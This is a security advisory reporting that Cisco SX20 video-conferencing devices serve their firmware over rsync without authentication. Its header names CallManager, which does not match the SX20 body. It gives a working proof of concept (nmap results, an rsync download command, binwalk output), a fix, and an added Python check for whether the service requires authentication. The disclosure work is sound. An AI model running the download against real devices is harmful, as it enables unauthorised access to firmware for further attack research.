usd-2018-0035 | Cisco Unified Communications Manager (CallManager)/11.5.1.15900-18 (likely in all versions)

Advisory ID: usd-2018-0035
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 11.5.1.15900-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Medium
Vendor URL: https://www.cisco.com
Vendor Status: „is not considered to be an exposure“

Description

usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.

The Cisco SX20 TelePresence Quick Set is a video conferencing system. Typically it is paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.

Proof of Concept (PoC)

Let 10.10.10.10 be the IP address of a SX20 device.

An nmap scan identifies the following open services:

4043/tcp open rsync (protocol version 29)
4045/tcp open lockd?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer:
| version: ce9.4.1 6ae80e1f2ee 2018-08-14
| method: rsync
| url: rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg
|_ targets: 102300-3,102310-0,102310-1,101282-0

The following command will download the idefix.pkg file advertised by TCP port 4045:
# rsync rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg .

Using binwalk, the file is identified as a firmware package:
# binwalk idefix.pkg

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
3487 0xD9F PEM certificate
7324 0x1C9C Executable script, shebang: "/bin/sh"
13549 0x34ED Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@101:16
13613 0x352D Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@96:5
13672 0x3568 Unix path: /sys/class/gpio/gpio137/value
13808 0x35F0 Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20
44361273 0x2A4E639 uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: "CISCO firmware 32"
44496781 0x2A6F78D CRC32 polynomial table, little endian
44505174 0x2A71856 Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: "oo long"
44607241 0x2A8A709 CRC32 polynomial table, little endian
44612405 0x2A8BB35 uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: "CISCO ramdisk 20180605-3a15e0444CertISW"
44613317 0x2A8BEC5 gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25
64949749 0x3DF0DF5 uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "CISCO kernel 20180605-3a15e04445CertISW"
64967148 0x3DF51EC gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00)
68741741 0x418EA6D Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34
89684647 0x5587AA7 Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39

Please note that at the time of this writing, usd AG has not performed any additional firmware analysis.

Fix

Enable authentication for the rsync service or disable it if possible.
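As an added verification check (not part of the usd AG advisory), the following Python script performs only the rsync daemon handshake up to the module request and reports whether the module answers with "@RSYNCD: OK" (no authentication, the state described above) or "@RSYNCD: AUTHREQD" (authentication enabled, the state the fix should produce). Port 4043 and the module name idefix are taken from the advisory; the sample daemon replies are constructed, not captured from a device.

```python
import socket

# Constructed sample replies in the form an rsync daemon (protocol 29) sends
# after the client names a module. Not captured from a real SX20.
SAMPLE_OPEN = b"@RSYNCD: 29\n@RSYNCD: OK\n"
SAMPLE_AUTH = b"@RSYNCD: 29\n@RSYNCD: AUTHREQD c0nStRuCtEdChAlLeNgE\n"
SAMPLE_ERROR = b"@RSYNCD: 29\n@ERROR: Unknown module 'idefix'\n"
SAMPLE_MOTD = b"@RSYNCD: 29\nWelcome to this daemon\n@RSYNCD: OK\n"


def classify_reply(data: bytes) -> str:
    """Map the daemon's lines to one of: unauthenticated, auth-required, error, unknown.

    MOTD lines that the daemon may print before its verdict are skipped,
    exactly as the rsync client does when it reads the module response.
    """
    for line in data.decode("ascii", "replace").splitlines():
        if line.startswith("@RSYNCD: OK"):
            return "unauthenticated"
        if line.startswith("@RSYNCD: AUTHREQD"):
            return "auth-required"
        if line.startswith("@ERROR"):
            return "error"
    return "unknown"


def check_module(host: str, port: int = 4043, module: str = "idefix",
                 timeout: float = 5.0) -> str:
    """Run the handshake up to the module request and classify the answer.

    No file listing or transfer is requested; the connection is closed as
    soon as the daemon has stated whether the module needs credentials.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"@RSYNCD: 29\n")          # client greeting
        banner = sock.recv(256)                  # daemon greeting
        if not banner.startswith(b"@RSYNCD:"):
            return "unknown"                     # not an rsync daemon
        sock.sendall(module.encode("ascii") + b"\n")
        reply = sock.recv(1024)
        return classify_reply(banner + reply)


if __name__ == "__main__":
    # Expected after the fix is applied: "auth-required" (or a refused connection).
    print(check_module("10.10.10.10"))
```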

Timeline

  • 2018-10-31 Advisory has been sent to psirt@cisco.com
  • 2018-11-07 Cisco states that it does not consider this to be an exposure
  • 2018-11-09 Public disclosure deadline extended to 2019-01-23
  • 2019-01-23 Security advisory released

Credits

This security vulnerability was discovered by Marcus Gruber and Maximilian Boehner of usd AG.